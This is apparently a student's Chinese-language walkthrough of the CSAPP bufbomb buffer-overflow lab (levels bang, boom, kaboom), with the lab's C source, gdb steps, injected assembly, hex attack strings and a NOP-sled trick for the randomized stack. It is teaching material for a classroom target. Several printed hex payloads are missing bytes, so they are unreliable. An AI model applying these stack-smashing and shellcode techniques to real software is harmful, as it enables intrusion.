CSAPP lab3 bufbomb-缓冲区溢出攻击实验(上)smoke fizz
CSAPP lab3 bufbomb-缓冲区溢出攻击实验(下)bang boom kaboom
栈结构镇楼
这里先给出getbuf的反汇编代码和栈结构,方便下面的使用。
栈结构:
第2关:bang
构造攻击字符串作为目标程序输入,造成缓冲区溢出,使目标程序能够执行bang函数;并且要篡改全局变量global_value为cookie值,使其判断成功。但我们知道全局变量放置在bss节或data节,并不存放在栈中,前面的方法只能修改栈中的内容,无法修改全局变量的内容。那我们需要换一种思路,先构建一段恶意代码,通过该段恶意代码,修改全局变量的值,以及其他操作。
我们需要将恶意代码放置在攻击字符串中,使得getbuf返回之后,首先执行这段恶意代码,然后再执行bang函数。
先看一下bang的源码:
#define NORMAL_BUFFER_SIZE 32
void test()
{
int val;
/* Put canary on stack to detect possiblecorruption */
volatile int local = uniqueval();
val = getbuf();
/* Check for corruption stack */
if (local != uniqueval())
{
printf("Sabotaged!: the stack has beencorrupted\n");
}
else if (val == cookie)
{
printf("Boom!: getbuf returned0x%x\n", val);
validate();
}
else
{
printf("Dud: getbuf returned0x%x\n", val);
}
}
int getbuf()
{
char buf[NORMAL_BUFFER_SIZE];
Gets(buf);
return ;
}
int global_value = ;
void bang(int val)
{
if (global_value == cookie)
{
printf("Bang!: You set global_value to 0x%x\n",
global_value);
validate();
}
else
printf("Misfire: global_value = 0x%x\n", global_value);
exit();
}
先找到全局变量的位置:在bang函数里看到有两个内存地址,正好和源程序里的判断相等对应,接下来确定哪一个是全局变量。
0x804d100和0x804d108那一个是全局变量?
这里我用gdb调试
gdb bufbomb
在getbuf函数设断点,运行,查看一下两个地址的值,很明显,0x804d100是全局变量。
注意这里的调试方法设置完断点后运行的指令
(gdb) r -u stu
这里的stu是userid !
到这里全局变量也找到了,那么我们也就能写出恶意代码来了。
movl $0x4f802594,0x804d100//将cookie赋值给全局变量
push $0x08048cad //函数bang的地址压入栈
ret
将恶意代码保存到扩展名为.s的汇编代码文件,然后用gcc –m32 –c 编译成.o可重定位目标文件,然后objdump –d 反编译出机器码。
这是恶意代码,我们需要的是这些16进制的机器码,我把它们放到buf区域里,然后执行就可以了。要执行这些代码就需要让控制流可以跳到这,只要把这段恶意代码的首地址放到getbuf函数的返回地址处就可以了,也就是buf缓冲区的首地址放到getbuf函数返回地址。接下来找buf缓冲区的首地址:
看一下getbuf函数,发现,在图中0x80491f7处,ebp减小开辟了一段空间,也就是buf区域,eax寄存器中放的就是该空间的首地址,即buf首地址。
用gdb调试,我们在0x80491fd也就是call gets之前设置断点来查看eax寄存器中的内容,查看eax的值。
处理成小端也就是
e8 39 68 55
最终编写的恶意代码:
c7 d1 /*movl $0x4f802594,0x804d100*/
4f
ad 8c /*push $x08048cad*/
c3 /*ret*/ e8 /*buff首地址0x556839e8*/
将其保存到一个txt文件中,用管道输入,通过hex2raw之后输入bufbomb程序。
完成!
第3关:boom
前面的攻击都是使目标程序跳转到特定函数,进而利用exit函数结束目标程序运行,在这个过程中我们都把原来的恢复现场需要用的返回地址和原test的ebp给破坏了。Boom这一关中,我们将修复这些被我们破坏的栈状态信息,让最后还是回到test中,让被攻击者不容易发现我们动了手脚,
另外,构造攻击字符串,使得getbuf都能将正确的cookie值返回给test函数,而不是返回值1。设置返回值也就是更改eax(eax中保存的就是函数的返回值)的值,可以用mov指令设置eax存的为cookie值。更改完要进入test函数继续执行下面的指令,也就是下图中这个位置,将这个地址压栈。
void test()
{
int val;
/* Put canary on stack to detect possiblecorruption */
volatile int local = uniqueval();
val = getbuf();
/* Check for corruption stack */
if (local != uniqueval())
{
printf("Sabotaged!: the stack has beencorrupted\n");
}
else if (val == cookie)///getbuf函数返回值为cookie
{
printf("Boom!: getbuf returned0x%x\n", val);
validate();
}
else
{
printf("Dud: getbuf returned0x%x\n", val);
}
}
综合起来恶意代码就是:
/*cookie0x4f802594*/
movl $0x4f802594,%eax //将返回值修改为cookie
pushl $0x8048dce //将call getbuf函数的下一条要执行的指令的地址压入返回地址
ret //用ret来执行返回地址
用同bang那关一样的方法,得到字节码:
恶意代码准备好了,将返回地址更改为指向这个代码的位置,把恶意代码放到buf缓冲区内,返回地址和bang一样。
接下来要恢复ebp的值,先得到ebp旧值。
gdb调试:在getbuf第一行,push ebp 设置断点。查看ebp的值。
ebp=0x55683a40,即40 3a 68 55
用这个值覆盖ebp值。ebp值在返回地址的低方位,放在返回地址前。
最终编写的恶意代码:
b8 4f /*movl $0x4f802594,%eax */
ce 8d /*pushl $0x8048dce */
c3 /*ret*/ 3a /*old ebp:0x55683a40*/
e8 /*buff首地址0x556839e8*/
将其保存到一个txt文件中,用管道输入,通过hex2raw之后输入bufbomb程序。
nice!
第4关:kaboom
这一关难度比前面都大。但也是承接上一关的,构造攻击字符串使getbufn函数,返回cookie值至testn函数,而不是返回值1,需要将cookie值设为函数返回值,复原被破坏的栈帧结构,并正确地返回到testn函数。但这一关与之前最大的不同在于地址空间随机化,每次攻击,被攻击函数的栈帧内存地址都不同,也就是函数的栈帧位置每次运行时都不一样,不能准确地跳转到栈空间的某个特定地址。因此,要想办法保证每次都能够正确复原原栈帧被破坏的状态,使程序每次都能够正确返回。
进入这一关需要加入-n选项,调的函数是testn和getbufn,而不是前面的test和getbuf。这道题有5个test case,要都通过才算过。
说点题外话这一关还有一个别名Nitro 硝化甘油,这是一种不稳定的火药,其实从这里也暗示了这一关的攻击不稳定。
先看一下源码:
#define KABOOM_BUFFER_SIZE 512
void testn()
{
int val;
volatile int local = uniqueval();
val = getbufn();
/* Check for corrupted stack */
if (local != uniqueval())
{
printf("Sabotaged!: the stack has been corrupted\n");
}
else if (val == cookie)
{
printf("KABOOM!: getbufn returned 0x%x\n", val);
validate();
}
else
{
printf("Dud: getbufn returned 0x%x\n", val);
}
}
int getbufn()
{
char buf[KABOOM_BUFFER_SIZE];
Gets(buf);
return ;
}
在这一关buffersize也从32增大到了512,这个做法是有意义的。
大概的思路是,虽然栈的初始地址不同,但会在一些范围里浮动,所以我们需要把我们的代码填在512字节的最后几个字节里,并且前面全面的空间都填上nop(编码为0x90
)。不管我们跳转到哪个nop,最后都会执行到我们的代码。
ebp是随机的,但是ebp相对esp是绝对的,根据上面的图中结合栈结构得出
ebp = esp + 0x24 + 4 = esp + 28
getbufn函数返回后要从0x8048e4a开始执行,将这个地址压栈。
设置cookie给eax。
综合得出恶意代码为:
mov $0x4f802594,%eax //将返回值修改为cookie
lea 0x28(%esp),%ebp //ebp=esp+28
push $0x8048e4a //将call getbufn函数的下一条要执行的指令的地址压入返回地址
ret
转换为字节码:
再回到getbufn函数:
要填入0x208+4+4=528字节。
因为随机,不知道程序会跳到哪里,所以把恶意代码放到最后面,用nop滑行。
(nop不会执行任何操作,只有PC加一,机器码是90。)
所以,前面塞满90,最后面写上恶意代码程序,以及最后要跳的位置。
寻找要跳的地址:
由于随机化,buf首地址不确定。用gdb调试:在0x8049218设断点,看eax的值。(每执行一次,要用c命令继续,进而执行下一次)
如此这样五次,注意这次调试时运行r需要加入-n
(gdb) r -nu stu
这样获得了5个buf起始地址。
0x55683808
0x556837a8
0x55683878
0x55683858
0x556837a8
取最高地址0x55683878(78 38 68 55)作为返回地址,这样就会一路滑行到恶意代码,执行恶意代码。
综上:
/**/ /**/ /**/ /**/ b8 4f /*mov $0x4f802594,%eax*/
8d 6c /*lea 0x28(%esp),%ebp */
4a 8e /*push $0x8048e4a */
c3
/*0x55683878*/
同上管道输入。
注意:需要注意的是因为在Nitro模式下主程序需要读五次input以满足执行五次的需要,因此在执行./hex2raw程序时请注意添加 -n flag以保证input string 被复制五次每次以\n结尾以结束每次的gets()函数调用。
完结撒花!